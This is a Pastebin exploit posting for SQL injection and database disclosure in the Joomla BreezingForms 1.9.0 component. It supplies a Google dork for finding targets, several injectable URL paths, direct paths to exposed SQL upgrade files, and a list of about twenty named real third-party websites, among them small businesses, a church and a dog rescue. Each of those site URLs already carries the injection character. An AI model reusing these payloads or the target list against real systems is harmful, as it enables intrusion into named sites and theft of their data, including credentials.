Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla BreezingForms 1.9.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 10/02/2019
- # Vendor Homepage : crosstec.org
- # Software Download Link : crosstec.org/en/breezingforms-lite.html
- crosstec.org/en/downloads/breezingforms-for-joomla.html
- github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_breezingforms/
- # Software Information Link : extensions.joomla.org/extension/breezing-forms/
- crosstec.org/en/downloads/breezingforms-for-joomla.html
- # Software Version : (build 930) - 1.9.0
- # Software Requirements: Joomla!® 3.x or 2.5. -- Version: 1.9.0 (build 930)
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_breezingforms''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- BreezingForms (free) is the only free joomla forms, state of the art form
- builder for Joomla!® that combines modern techniques with enterprise features.
- ####################################################################
- # Impact :
- ***********
- * Joomla BreezingForms 1.9.0 and other versions - component for Joomla is prone
- to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_breezingforms&view=form&Itemid=[SQL Injection]
- /index.php?option=com_breezingforms&Itemid=[SQL Injection]&lang=hu
- /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[SQL Injection]
- /index.php?raw=true&option=com_breezingforms&bfCaptcha=true&Itemid=[ID-NUMBER]&bfMathRandom=[SQL Injection]
- /index.php?option=com_breezingforms&view=form&Itemid=[SQL Injection]&lang=de&new_lang=bg&new_lang=eng&nLang=nl
- /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[ID-NUMBER]&value=[SQL Injection]
- /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[ID-NUMBER]&tmpl=component&value=[SQL Injection]
- /index.php?option=com_breezingforms&Itemid=[ID-NUMBER]&ff_form=[ID-NUMBER]&ff_applic=mod_facileforms&ff_module_id=[ID-NUMBER]&format=html&tmpl=component&ff_frame=[SQL Injection]
- /index.php?option=com_breezingforms&tmpl=component&Itemid=[ID-NUMBER]&ff_contentid=[ID-NUMBER]&ff_form=[ID-NUMBER]&ff_applic=plg_facileforms&format=html&ff_frame=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_breezingforms/sql/upgrade_1.1.sql
- /administrator/components/com_breezingforms/sql/upgrade_1.2.sql
- /administrator/components/com_breezingforms/sql/upgrade_1.3.sql
- /administrator/components/com_breezingforms/sql/upgrade_1.4.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] supremelaptopservices.com/index.php?option=com_breezingforms&Itemid=
- 104&ff_form=6&ff_applic=mod_facileforms&ff_module_id=172
- &format=html&tmpl=component&ff_frame=1%27
- [+] residenciaescolarsanjose.es/index.php/index.php?lang=&raw=true&option=
- com_breezingforms&checkCaptcha=true&Itemid=301&value=11%27
- [+] covan.es/index.php?option=com_breezingforms&view=form&Itemid=4971%27
- [+] cetabol.bo/sitio/index.php?option=com_breezingforms&view=form&Itemid=3141%27
- [+] antiochfellowship.co.za/index.php?option=com_breezingforms&view=form&Itemid=5471%27
- [+] tomatismallorca.com/index.php?option=com_breezingforms&view=form&Itemid=5071%27
- [+] philwareing.com/index.php?option=com_breezingforms&view=form&Itemid=1381%27
- [+] puppylovegrooming.com/index.php?raw=true&option=com_breezingforms
- &bfCaptcha=true&Itemid=4&bfMathRandom=11%27
- [+] bichonrescuebrigade.org/index.php?raw=true&option=com_breezingforms
- &bfCaptcha=true&Itemid=13&bfMathRandom=11%27
- [+] igfa.gr/index.php?option=com_breezingforms&view=form&Itemid=1421%27
- &lang=de&new_lang=bg&new_lang=tr&nLang=nl
- [+] cours-mosaique.com/index.php?lang=&raw=true&option=com_breezingforms
- &checkCaptcha=true&Itemid=0&tmpl=component&value=1%27
- [+] marbest.es/index.php?option=com_breezingforms&view=form&Itemid=1201%27
- [+] jelentkezes.mce.hu/index.php?lang=&raw=true&option=com_breezingforms
- &checkCaptcha=true&Itemid=0&tmpl=component&value=11%27
- [+] nwsassociates.co.uk/index.php?lang=&raw=true&option=com_breezingforms
- &checkCaptcha=true&Itemid=108&value=11%27
- [+] hertford.co.za/index.php?option=com_breezingforms&view=form&Itemid=7511%27
- [+] bine-immo.de/index.php?option=com_breezingforms&tmpl=component&Itemid=2061
- &ff_contentid=16&ff_form=8&ff_applic=plg_facileforms&format=html&ff_frame=11%27
- [+] datacat.name/index.php?option=com_breezingforms&Itemid=1091%27&lang=hu
- [+] bookhamcourt.co.uk/index.php?lang=&raw=true&option=com_breezingforms
- &checkCaptcha=true&Itemid=0&tmpl=component&value=11%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Declaration of facileFormsMenus::load() should be compatible
- with JTable::load($keys = NULL, $reset = true) in /web/htdocs
- /www.covan.es/home/components/com_breezingforms/facileforms.class.php on line 364
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement